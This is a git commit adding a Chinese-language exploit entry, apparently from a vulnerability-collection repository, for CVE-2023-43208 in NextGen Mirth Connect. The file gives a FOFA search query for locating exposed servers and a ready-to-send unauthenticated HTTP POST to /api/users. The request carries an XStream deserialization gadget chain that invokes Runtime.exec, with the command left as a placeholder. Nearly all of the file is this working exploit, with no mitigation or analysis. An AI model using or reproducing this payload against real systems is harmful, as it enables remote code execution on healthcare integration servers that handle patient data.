24-5-30更新漏洞

2024-05-31 00:09:37 +08:00
parent 22292223ef
commit 3df4773cbe
11 changed files with 475 additions and 0 deletions
--- a/NextGen-Mirth-Connect-XStream反序列化远程代码执行漏洞(CVE-2023-43208).md
+++ b/NextGen-Mirth-Connect-XStream反序列化远程代码执行漏洞(CVE-2023-43208).md
@@ -0,0 +1,70 @@
+## NextGen-Mirth-Connect-XStream反序列化远程代码执行漏洞(CVE-2023-43208)
+
+NextGen Mirth Connect 4.4.1之前版本存在远程代码执行漏洞，未经身份认证的攻击者可利用该漏洞远程执行代码。
+
+## fofa
+
+```
+title="Mirth Connect Administrator"
+```
+
+## poc
+
+```
+POST /api/users HTTP/1.1
+Host: 
+X-Requested-With: OpenAPI
+Content-Type: application/xml
+ 
+<sorted-set>
+    <string>abcd</string>
+        <dynamic-proxy>
+            <interface>java.lang.Comparable</interface>
+            <handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler">
+              <target class="org.apache.commons.collections4.functors.ChainedTransformer">
+                <iTransformers>
+                  <org.apache.commons.collections4.functors.ConstantTransformer>
+                    <iConstant class="java-class">java.lang.Runtime</iConstant>
+                  </org.apache.commons.collections4.functors.ConstantTransformer>
+                  <org.apache.commons.collections4.functors.InvokerTransformer>
+                    <iMethodName>getMethod</iMethodName>
+                    <iParamTypes>
+                      <java-class>java.lang.String</java-class>
+                      <java-class>[Ljava.lang.Class;</java-class>
+                    </iParamTypes>
+                    <iArgs>
+                      <string>getRuntime</string>
+                      <java-class-array/>
+                    </iArgs>
+                  </org.apache.commons.collections4.functors.InvokerTransformer>
+                  <org.apache.commons.collections4.functors.InvokerTransformer>
+                    <iMethodName>invoke</iMethodName>
+                    <iParamTypes>
+                      <java-class>java.lang.Object</java-class>
+                      <java-class>[Ljava.lang.Object;</java-class>
+                    </iParamTypes>
+                    <iArgs>
+                      <null/>
+                      <object-array/>
+                    </iArgs>
+                  </org.apache.commons.collections4.functors.InvokerTransformer>
+                  <org.apache.commons.collections4.functors.InvokerTransformer>
+                    <iMethodName>exec</iMethodName>
+                    <iParamTypes>
+                      <java-class>java.lang.String</java-class>
+                    </iParamTypes>
+                    <iArgs>
+                      <string>执行的命令</string>
+                    </iArgs>
+                  </org.apache.commons.collections4.functors.InvokerTransformer>
+                </iTransformers>
+              </target>
+              <methodName>transform</methodName>
+              <eventTypes>
+                <string>compareTo</string>
+              </eventTypes>
+        </handler>
+    </dynamic-proxy>
+</sorted-set>
+```
+